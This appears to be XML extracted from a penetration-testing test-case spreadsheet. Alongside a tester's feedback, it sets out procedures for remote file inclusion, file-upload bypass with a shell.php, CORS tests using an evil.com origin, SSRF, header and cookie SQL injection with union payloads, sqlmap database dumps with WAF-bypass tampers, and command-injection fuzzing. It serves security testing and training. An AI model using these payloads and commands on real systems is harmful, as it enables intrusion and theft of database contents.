      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">For instruction "right click on intercepted request" where (ie which tab/sub-tab) and how would i identify the request I'm supposed to right-click on
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>•</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>An explanation of what "spider this host" is or the exact text we are supposed to click in the context menu</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">
1. Search for the parameters on Burp that will be able to load content of any remote websites like page=, url= e.t.c 
2. If requests are found containing these parameters-&gt;Right click-&gt; send it to Repeater
3. Create any txt file in kali linux and host it in web server.
4. on page= or url=, put the ip of file hosted on kali server like:-
GET /comment.php?page=192.168.10.11/virus.txt  HTTP/1.1
Host: any.com
5. If u are able to see the content of virus.txt, then any.com has RFI.
</t>
  </si>
  <si>
    <t>Website should not be able to load contents of files hosted on different servers</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">• search for parameters in which tab of burp?
• no mention that we need anything related to Kali Linux or that we need to spin up a web server
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">• instructions on how to install Kali Linux or setup a vm 
• instructions on how to spin up a webserver (next instructions mention Kali server so I'll assume that the server is meant to be hosted on the Kali machine)
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">• put text that should be copy pasted in quotes or something for clarity
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>• name of txt file was not mentioned before this step</t>
    </r>
  </si>
  <si>
    <t>QT_PEN_TIER_2_06</t>
  </si>
  <si>
    <t>File upload by changing file extensions</t>
  </si>
  <si>
    <t>Verify if user is able to upload a malicious file on a website</t>
  </si>
  <si>
    <t>Pre-Condition: The Burp certificate should be installed and the browser proxy with localhost and port 8080 should be set
1.Open the browser and go to the web site
2.Check all the links in the website where you can upload some document or image</t>
  </si>
  <si>
    <t xml:space="preserve">1. Create any file using notepad with extensions .py or .php like email.py or shell.php
2. Verify if you are able to upload those files on the webpages manually 
</t>
  </si>
  <si>
    <t>User should not be able to upload malicious files</t>
  </si>
  <si>
    <t xml:space="preserve">If user is not able to upload the file, the website is checking the file extension.  In that case we verify if user is able to upload file using burp:- 
1. Find the webpages on the website where you can find the option to upload files-&gt; Open burp suite and click intercept on before uploading a file(example.py)-&gt;change the extension of file in burp according to the website
(Note:suppose website only accepts jpeg or jpg file, then we change file extension in burp to example.jpg.py)
-&gt; click the forward button
2.If the above process does not work then we change the file extension of example.py to example.jpg manually-&gt; Open burp suite and click intercept on before uploading the file(example.jpg)-&gt; click upload button on the webpage and come back to burp to check the intercepted request-&gt; change the file extension in burp to example.py and click the forward button
3. If the above process does not work out then  we change file Content-Type in intercept tab to image/jpeg
(If we upload example.py, the burp intercepted request will show the file content as text/py as it is the original content. Change the Content-Type to  image/jpg as accepted by the website)
</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_07</t>
  </si>
  <si>
    <t>Source Code Disclosure using payloads</t>
  </si>
  <si>
    <t>Verify if website displays some sensitive data like source code,database information e.t.c</t>
  </si>
  <si>
    <t>Pre-Condition: The Burp certificate should be installed and the browser proxy with localhost and port 8080 should be set
1.Open Burp suite
2.Open the browser and got to the website to attack
3.Add "/idnf " at the end of url like www.google.com/idnf
4.Intercept the response
5.Send it to intruder
6.add idnf to scope
7.Select dicc.txt in payloads and click on Start Attack
Now verify which responses has got the bigger size by sorting the payload output by size and right click on those requests-&gt;show response in browser-&gt; copy the url and paste in browser.</t>
  </si>
  <si>
    <t>Website should not display any sensitive information</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_08</t>
  </si>
  <si>
    <t xml:space="preserve">Critical file found using payloads </t>
  </si>
  <si>
    <t>Verify if web application has any file that
contains some kind of information that may be will use in further attacking</t>
  </si>
  <si>
    <t>Pre-Condition: The Burp certificate should be installed and the browser proxy with localhost and port 8080 should be set
1.Open Burp suite
2.Open the browser and got to the website to attack
3..Add "/idnf " at the end of url like www.any.com/idnf
4.Intercept the response
5.Send it to intruder-&gt;click "clear" button
6.add idnf to scope-&gt;click the payloads tab
7.Load dicc.txt in payload and click on Start Attack
Now verify which responses has got the bigger size by sorting the payload output by size and right click on those requests-&gt;show response in browser-&gt; copy the url and paste in browser.</t>
  </si>
  <si>
    <t>Web application should not display any file which contains sensitive information</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_09</t>
  </si>
  <si>
    <t>Missing SPF record using tool "theharvester"</t>
  </si>
  <si>
    <t>Verify if the website is having mailing servers with no missing spf records</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Note : To install virtual box , please refer below link
https://www.youtube.com/watch?v=63_kPIQUPp8
Note: To install kali linux in virtual box , refer below link
https://www.youtube.com/watch?v=YwfvQmFveNg
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">1. For SPF check if the website has mailing servers with burp suite or theharvester like (contact us or support@google.com)
2. Using </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>"theHarvester"</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> we can find mailing servers or subdomains in websites which are used to send the mails
3. Open kali-&gt; go to terminal -&gt; install theharvester tool using  command  " #apt-get install theharvester" 
then  after installing theharvester enter the command 
    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">theHarvester -d any.com -l 500 -b google
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">    This will give out the list of mailing servers present for a website e.g contactus@any.com
4. To check that domain have valid spf records go to :-
     http://www.kitterman.com/spf/validate.html
5. Copy paste the name of the mailing servers and click the button "Get SPF Record(if any)"</t>
    </r>
  </si>
  <si>
    <t>Valid spf records found / SPF PASS should be displayed</t>
  </si>
  <si>
    <t>- A walk-through of the steps to install Kali Linux and theharvester would be useful
    - Installation instructions for Kali Linux on Windows 10 ( install from Microsoft Store )
    - Installation instructions for theharvester on Kali Linux ( "sudo install theharvester" )
- No results found for juice-shop using theharvester
- Not able to perform steps 4 and 5 because no mailing servers were found (nothing to paste into kitterman.com/spf/validate.html)</t>
  </si>
  <si>
    <t>Updated</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_10</t>
  </si>
  <si>
    <t>Valid DMARC records</t>
  </si>
  <si>
    <t>Verify if the website with mailing servers have a valid DMARC record</t>
  </si>
  <si>
    <t>1. To check for DMARC records, go to https://www.dmarcanalyzer.com/dmarc/dmarc-record-check/
 copy-paste the name of domain for which you will be validating the records e.g any.com
2. The other way to check the DMARC records is to send a mail to yourself on gmail via website servers e.g support.any.com  
Use :  https://anonymousemail.me/   (to send email  from support.any.com)
 -&gt; go to the gmail account on which you received the mail-&gt; open that mail-&gt; click more-&gt;select "show original"</t>
  </si>
  <si>
    <t>DMARC PASS / Valid DMARC records should be displayed</t>
  </si>
  <si>
    <t>mailto:me@support.any.com</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_11</t>
  </si>
  <si>
    <t>Insecure CORS using Burp</t>
  </si>
  <si>
    <t>Veirfy if website makes a valid request to an api on a different server in a different domain</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-Condition: The Burp certificate should be installed and the browser proxy with localhost and port 8080 should be set
1.Open the browser and go to the website (Ex: any.com)
2.Open Burp Suite-&gt;Go to proxy and intercept on-&gt;Go to the browser refresh the webpage and intercept the request-&gt;Right click on intercepted request to send it to spider
3.Go to targets tab in burp-&gt; select the base url(Ex: any.com)-&gt;right click spider this host
</t>
  </si>
  <si>
    <t>- These steps are no longer correct in current version of BurpSuite:
2.Open Burp Suite-&gt;Go to proxy and intercept on-&gt;Go to the browser refresh the webpage and intercept the request-&gt;Right click on intercepted request to send it to spider
3.Go to targets tab in burp-&gt; select the base url(Ex: any.com)-&gt;right click spider this host
^ In latest version, app uses term "scan" instead of "spider". To scan a host, go to dashboard, click "New Scan" button, enter host URL and click OK.</t>
  </si>
  <si>
    <t>For Response Headers:-
1. Click on burp(top left corner) search-&gt;Enter "access-control-allow-origin" text.
    (select inscope and response headers.) -&gt;Search response for "access-control-allow-origin" and if you find a URL, then send the url to repeater-&gt;click on go-&gt;Add new header in request body i.e Origin: http://evil.com or null-&gt; If you find Access-control-allow-origin: evil.com| * |null in response, then the website is vulnerable
FOR REQUEST HEADERS:- search for embed?url=
1. Use burpsuite to check if the website has CORS
    enabled or not. Add new header in request
    body i.e Origin: http://evil.com or null
2. If you find Access-control-allow-origin: evil.com| * |null in response,
   Then domain is vulnerable
NOTE: access-control-allow-origin: *  [can't be exploited /improperly configured but secured ]</t>
  </si>
  <si>
    <t>Website should make a valid request to an api on a different server in a different domain</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">- Suggestion: highlight input strings to isolate them from surrounding text - e.g "Enter access-control-allow-origin text" → "Enter 'access-control-allow-origin' text"
- All juice-shop response headers use param "Access-Control-Allow-Origin: * "
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">per instructions:
"NOTE: access-control-allow-origin: *  [can't be exploited /improperly configured but secured ]"
</t>
    </r>
  </si>
  <si>
    <t>QT_PEN_TIER_2_12</t>
  </si>
  <si>
    <t>Password Reset Token Leakage while changing password on a website using forgot password mechanism</t>
  </si>
  <si>
    <t>Verify if a third party website leaks the password reset token</t>
  </si>
  <si>
    <t>Pre-Condition: The Burp certificate should be installed and the browser proxy with localhost and port 8080 should be set
1. Go to the website(Ex: any.com) and click on login button and then click on "forgot password" 
2. Enter the mail id on which you want to receive the password reset link and confirm
3. Go to the mail id and open the mail-&gt; open burp and start intercepting--&gt; click the link recieved in the mail -&gt; go back to burp and keep forwarding until you see a Third party website with reference header leaking the password reset token link as shown below is displayed in the request:-
GET /o/oauth2/iframe HTTP/1.1
Host: hacked.website.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: https://any.com/auth/reset-password?email=abcd@gmail.com&amp;token=9887654321
Upgrade-Insecure-Requests: 1</t>
  </si>
  <si>
    <t>Third party sites should not leak password reset tokens</t>
  </si>
  <si>
    <t>- The juice shop doesn't send password reset link via email – uses security question instead.</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_13</t>
  </si>
  <si>
    <t>SSRF using possible parameters</t>
  </si>
  <si>
    <t>Verify if a server makes request to another url which can be used to get ip address or system configuration files that are not intended to be exposed</t>
  </si>
  <si>
    <t>Without the video this part would've been very unclear and I would not have been able to complete it. Could not complete step 3. There was no option to spider that I could find by following the instructions or otherwise</t>
  </si>
  <si>
    <t xml:space="preserve">1. Click on Search-&gt;select in scope only, request header and request body-&gt; search for following parameters in search bar :-
    [dest,redirect,uri,url,file,folder,document,path,continue,root,path,pg,style,window,next,data,pdf,
    reference,site,html,template,php_path,reference,site,html,doc,
    feed,host,val,validate,domain,port,to,out,callback,return,page,navigation,open,result,view,dir,show]
2. If you find any request with above paramaters then, send that request to repeater-&gt; click the "Burp Collaborator Client"-&gt;Set the poll to one and click "Copy to clipboard"-&gt; goto the repeater with vulnerable parameter-&gt;clear the value of vulnerable parameter and write https:// and paste the value from burp collaborator client-&gt; click the go button-&gt; go back to the burp collaborator client and check for responses
</t>
  </si>
  <si>
    <t>Server should not make request to burp collaborator client</t>
  </si>
  <si>
    <t>Don't think I found the "Search" described in the intructions. There are several search boxes in the program which I tried pasting the parameters in. Didn't come up with any results, so I have no comments for #2.</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_14</t>
  </si>
  <si>
    <t>SQL Injection on Headers(HEADER Based)</t>
  </si>
  <si>
    <t>Verify if entered data in Header parameter is throwing a database related error</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-Condition: The Burp certificate should be installed and the browser proxy with localhost and port 8080 should be set
1.Open the browser and go to the web site(Ex: any.com)
2. Enter the credentials to login but do not click on submit
3.Open Burp Suite-&gt;Go to proxy and intercept on-&gt;Go to the web site and now click on submit and intercept the request-&gt;Right click on intercepted request to send it to repeater
4.Go to Repeater tab-&gt; Click on Go button-&gt; Click on Render tab from Response section to see the response. 
</t>
  </si>
  <si>
    <t>Clicked action to send to repeater. Clicked "send", no go button</t>
  </si>
  <si>
    <t>Verify if "\" throws an error on webpage like:-
   "You have an error in your sql syntax. check the manula that corresponds to your MYSQL server version for the right      syntax to use near "\" Limit 0,1' at line 1"</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">1. Add  " \ </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">" </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">after the value of all the Headers like 
HOST, User-Agent, Referer and Location.
Ex. </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0)</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">\  </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t>and check the response in render tab
2. Now if we get an error, we will balance the query:-If you see the error for \ with double quotes like "\", then you close the statement with double quotes as " --+.
if you see error for \ with single quote like '\' ,  then you close the statement with '--+ 
you can also use # for balancing the query as mentioned below
' #
"  #</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">Wrong syntax error messageshould not be displayed </t>
  </si>
  <si>
    <t>No Location header. Got this as a response: &lt;BODY&gt;&lt;h2&gt;Bad Request - Invalid Hostname&lt;/h2&gt;
&lt;hr&gt;&lt;p&gt;HTTP Error 400. The request hostname is invalid.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Verify number of vulnerable columns</t>
  </si>
  <si>
    <t xml:space="preserve"> To verify the number of columns use below query betwen the quote and hash symbol or quote and --+ symbol  as mentioned below
' order by 10# ( Start with a big number and then keep reducing until we get error fixed) --+
or
" order by 10# or " order by 99--+  //if correct, this will not throw any error
Now once you figure out the number of columns, use the below command to display the number of vulnerable coulmns :- 
' union all select 1,2,...so on #
</t>
  </si>
  <si>
    <t>Vulnerable columns should not be displayed</t>
  </si>
  <si>
    <t>Not sure what "vulnerable columns" are or where to find them in Burp. These instructions don't make any sense to me</t>
  </si>
  <si>
    <t>Extract database ,version and user information</t>
  </si>
  <si>
    <t xml:space="preserve">To extract database and version number-
Use database(), version() and user() function in place of vulnerable columns. For eg.
If we get to know that column 1 and 2 are vulnerable , we use below command
' union all select database(),version(), 3,4, ....so on # 
</t>
  </si>
  <si>
    <t>Database and version information should not be displayed</t>
  </si>
  <si>
    <t>Same problem as above</t>
  </si>
  <si>
    <t>SQL Injection on Cookies( COOKIE Based)</t>
  </si>
  <si>
    <t>Verify if entered data in Cookie parameter is throwing a database related error</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">1. Add  " \ </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">" </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">after the value of Cookie like 
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>Cookie: YPF8827340282Jdskjhfiw_928937459182JAX666=182.73.206.190; SRV=lander03|XS7pR|XS7pQ; uid=woodland5d2ee93dcf1e38.34871164</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">\
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t>and check the response in render tab
2. Now if we get an error, we will balance the query:-If you see the error for \ with double quotes like "\", then you close the statement with double quotes as " --+.
if you see error for \ with single quote like '\' ,  then you close the statement with '--+ 
you can also use # for balancing the query as mentioned below
' #
"  #</t>
    </r>
  </si>
  <si>
    <t>There is no cookie like the one described. Tried changing a one closest to this pattern. Send still seemed to work</t>
  </si>
  <si>
    <t xml:space="preserve"> To verify the number of columns, please use below query between the quote and hash symbol or quote and --+ symbol as mentioned below
' order by 10# ( Start with a big number and then keep reducing until we get error fixed) --+
or
" order by 10# or " order by 99--+  //if correct, this will not throw any error
Now once you figure out the number of columns, use the below command to display the number of vulnerable coulmns :- 
' union all select 1,2,...so on #
</t>
  </si>
  <si>
    <t>Automation of SQLI - Get Based</t>
  </si>
  <si>
    <t>1. Error was: Unknown host: mutilidae.com. 2. Again, these instructions make no sense to me</t>
  </si>
  <si>
    <t>1.Now go to kali linux-&gt; open terminal-&gt;type sqlmap-&gt;
2.Give the sqlmap command shown below:-
sqlmap -u "http://mutilidae.com/?id=1*" --batch --banner --dbs
(Note:- give * after vulnerable parameter as sqlmap thinks * is an identifier where it has to attack)
3. After extracting the databases, we move on to find the tables in the database with the command
sqlmap -u "http://mutilidae.com/?id=1*" --batch --banner -D DBname --tables
(Note:- DBname should be from the names displayed after running command name example
sqlmap -u "http://mutilidae.com/?id=1*" --batch --banner -D usercredentials --tables)
4. After extarcting the tables you can dump the entire database with below command
sqlmap -u "http://mutilidae.com/?id=1*" --batch --banner -D DBname -T tablename --dump</t>
  </si>
  <si>
    <t>Database information should not be displayed</t>
  </si>
  <si>
    <t>Don't have Kali linux</t>
  </si>
  <si>
    <t>Automation of SQLI - Post Based</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-Condition: The Burp certificate should be installed and the browser proxy with localhost and port 8080 should be set
1.Open the browser and go to the web site(Ex: any.com)
2. Enter the credentials to login but do not click on submit
3.Open Burp Suite-&gt;Go to proxy and intercept on-&gt;Go to the web site and now click on submit and intercept the request-&gt;Right click on intercepted request to send it to spider
4.Go to Target tab-&gt; Click on selected target-&gt; Search for all POST request
</t>
  </si>
  <si>
    <t xml:space="preserve">1. Add  " \ " one by one after the parameter values of all the POST requests like like 
POST /path/script.cgi HTTP/1.0
From: frog@jmarshall.com
User-Agent: HTTPTool/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
home=Cosby&amp;favorite+flavor=flies\
2. Now if we get an error, we will balance the query:-If you see the error for \ with double quotes like "\", then you close the statement with double quotes as " --+.
if you see error for \ with single quote like '\' ,  then you close the statement with '--+ 
you can also use # for balancing the query as mentioned below
' #
"  #
3. Once you find the vulnerable parameter put * in the parameter value
4. Intercept on-&gt; click submit -&gt; capture the request in burp suite -&gt; right click -&gt; copy to file -&gt; save the file with .txt extension
</t>
  </si>
  <si>
    <t>1.Now go to kali linux-&gt; open terminal-&gt;type sqlmap-&gt;
2.Give the sqlmap command shown below:-
sqlmap -r filename.txt --batch --banner --dbs
(Note:- filename can be anyname you want to give the file you saved after capturing the reqeust from burp)
3. After extracting the databases, we move on to find the tables in the database with the command
sqlmap -r filename.txt  --batch --banner -D DBname --tables
(Note:- DBname should be from the names displayed after running command name example
sqlmap -u "http://mutilidae.com/?id=1*" --batch --banner -D usercredentials --tables)
4. After extarcting the tables you can dump the entire database with below command
sqlmap -r filename.txt  --batch --banner -D DBname -T tablename --dump</t>
  </si>
  <si>
    <t>Automation of SQLI - Header Based</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-Condition: The Burp certificate should be installed and the browser proxy with localhost and port 8080 should be set
1.Open the browser and go to the web site(Ex: any.com)
2. Enter the credentials to login but do not click on submit
3.Open Burp Suite-&gt;Go to proxy and intercept on-&gt;Go to the web site and now click on submit and intercept the request-&gt;Right click on intercepted request to send it to spider
4.Go to Target tab-&gt; Click on selected target-&gt; Search for all vulnerable header request
</t>
  </si>
  <si>
    <t>1. Add  " \ " after the value of all the Headers like 
HOST, User-Agent, Referer and Location.
Ex. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0)\  and check the response in render tab
2. Now if we get an error, we will balance the query:-If you see the error for \ with double quotes like "\", then you close the statement with double quotes as " --+.
if you see error for \ with single quote like '\' ,  then you close the statement with '--+ 
you can also use # for balancing the query as mentioned below
' #
"  #
3. Once you find the vulnerable header, put * after the header
Ex. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0)*
4. Intercept on-&gt; click submit -&gt; capture the request in burp suite -&gt; right click -&gt; copy to file -&gt; save the file with .txt extension</t>
  </si>
  <si>
    <t>Automation of SQLI - Cookie Based</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-Condition: The Burp certificate should be installed and the browser proxy with localhost and port 8080 should be set
1.Open the browser and go to the web site(Ex: any.com)
2. Enter the credentials to login but do not click on submit
3.Open Burp Suite-&gt;Go to proxy and intercept on-&gt;Go to the web site and now click on submit and intercept the request-&gt;Right click on intercepted request to send it to spider
4.Go to Target tab-&gt; Click on selected target-&gt; Search for all request with vulnerable cookie parameters
</t>
  </si>
  <si>
    <t>1. Add  " \ " after the value of Cookie like 
Cookie: YPF8827340282Jdskjhfiw_928937459182JAX666=182.73.206.190; SRV=lander03|XS7pR|XS7pQ; uid=woodland5d2ee93dcf1e38.34871164\
and check the response in render tab
2. Now if we get an error, we will balance the query:-If you see the error for \ with double quotes like "\", then you close the statement with double quotes as " --+.
if you see error for \ with single quote like '\' ,  then you close the statement with '--+ 
you can also use # for balancing the query as mentioned below
' #
"  #
3. Once you find the vulnerable parameter put * in the parameter value
4. Intercept on-&gt; click submit -&gt; capture the request in burp suite -&gt; right click -&gt; copy to file -&gt; save the file with .txt extension</t>
  </si>
  <si>
    <t>WAF Bypass with SQLMAP</t>
  </si>
  <si>
    <t>1.Now go to kali linux-&gt; open terminal-&gt;type sqlmap-&gt;
2.Give the sqlmap command shown below:-
sqlmap -u "http://mutilidae.com/?id=1*" --batch --banner --tamper=modsecurityversioned
(Note:- give * after vulnerable parameter as sqlmap thinks * is an identifier where it has to attack)
3. After extracting the databases, we move on to find the tables in the database with the command
sqlmap -u "http://mutilidae.com/?id=1*" --batch --banner -D DBname --tables
(Note:- DBname should be from the names displayed after running command name example
sqlmap -u "http://mutilidae.com/?id=1*" --batch --banner -D usercredentials --tables)
4. After extarcting the tables you can dump the entire database with below command
sqlmap -u "http://mutilidae.com/?id=1*" --batch --banner -D DBname -T tablename --dump</t>
  </si>
  <si>
    <t xml:space="preserve">Below is the list of all tamper options which we can apply to verify if sqlmap bypasses waf:-
General Tamper testing:
tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
MSSQL:
tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes
MySQL:
tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_15</t>
  </si>
  <si>
    <t>Command Injection using possible parameters and delimeters</t>
  </si>
  <si>
    <t>Verify if the website is making any server execute operating system related commands</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-Condition: The Burp certificate should be installed and the browser proxy with localhost and port 8080 should be set
1.Open the browser and go to the web site(Ex: any.com)
2.Open Burp Suite-&gt;Go to proxy and intercept on-&gt;Go to the browser refresh the webpage and intercept the request-&gt;Right click on intercepted request to send it to spider
3.Go to targets tab in burp-&gt; select the url (Ex: any.com)-&gt;right click spider this host
</t>
  </si>
  <si>
    <t xml:space="preserve">1. Click on search in burp-&gt;select in scope only, request header and search for following parameters:-
   daemon, host, upload, dir, execute, download, log, ip, cli, cmd 
2. If you find any of the above mentioned parameters, right click-&gt; send it to Intruder&gt; then go to intruder tab on burp-&gt; click on "Positions" tab-&gt; click "Clear" button and deleter the value of the vulnerable parameter-&gt; add two values (a and b) to the vulnerable parameter like 
https://insecure-website.com/stockStatus?productID=380 to
https://insecure-website.com/stockStatus?productID=ab
3. Now click Add button by selecting a and b separately as shown below
https://insecure-website.com/stockStatus?productID=&amp;a&amp;&amp;b&amp;
4. Select the attack type as cluster bomb-&gt;click the Payloads tab-&gt; in Payload set 1 select delimeter list payloads and in Payload set 2 select cmd payload and click start Attack
</t>
  </si>
  <si>
    <t>Website should not be making the server execute operating system commands</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_16</t>
  </si>
  <si>
    <t>Verify if user's account is locked until 24 hours</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-Condition: The Burp certificate should be installed and the browser proxy with localhost and port 8080 should be set
1.Open the browser and go to the website (Ex: any.com)
2. Sign in on the website and enter credentials with correct username and wrong password  to login but do not click on submit button
